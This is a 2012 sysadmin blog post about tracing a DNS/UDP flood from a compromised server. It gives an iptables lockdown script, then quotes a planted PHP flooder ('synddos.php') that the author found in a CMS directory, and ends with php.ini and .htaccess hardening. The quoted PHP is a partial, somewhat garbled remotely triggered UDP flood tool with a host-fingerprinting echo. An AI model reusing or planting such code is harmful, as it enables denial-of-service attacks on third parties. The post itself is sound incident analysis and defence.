Home > IT Architecture, Networking Security, Security > resolved – port 53 dns flooding attack

resolved – port 53 dns flooding attack

April 13th, 2012

I found this port 53 dns flooding attack when the server became very unsteady. NIC was blipping and networking just went down without OS rebooting.

Using ntop as detector, I found the issue with DNS traffic was at a very high level(about 3Gb traffic). Then I determined to forbid DNS traffic, and only allow some usual ports.

  • Disable autoboot of iptables in case there's something wrong with iptables


chkconfig iptables off


  • here's the rules

[root@doxer ~]# cat iptables-stop-flood.sh

iptables -F

#Note that DROP is different than REJECT. REJECT will return error to client(telnet will return Connection refused from client), but DROP will just drop the packet(telnet will hang Trying and return Connection timed out).
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - if there's no -m, than --dport or --sport must be in a range
#todo - --ports source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp(Simple File Transfer Protocol, not SSH File Transfer Protocol<use SSH port>. )
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. reply is 8, request is 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

#disable custom IPs

for ip in `cat ban_ips.txt`;do

iptables -A INPUT -s $ip -j DROP


  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
chkconfig iptables on

After all these steps, dns traffic now dropped to normal status.


After several days' investigation, I finally found out that this attack was source from some worms(php worms?) embedded in dedecms's directory. Here's one file called synddos.php:

$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
echo "Warning to: opening";

$out .= "A";

$max_time = time()+$exec_time;

if(time() > $max_time){
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
fwrite($fp, $out);

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";

This is crazy! That explains the reason why there was so much DNS traffic out!

To cure this weakness:

1.disable fsockopen function in php.ini

disable_functions = fsockopen

2.in .htaccess file, limit php scripts from running

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ - [F]
RewriteRule data/(.*).(php)$ - [F]
RewriteRule templets/(.*).(php)$ - [F]

Good Luck!

  1. No comments yet.
Comments are closed.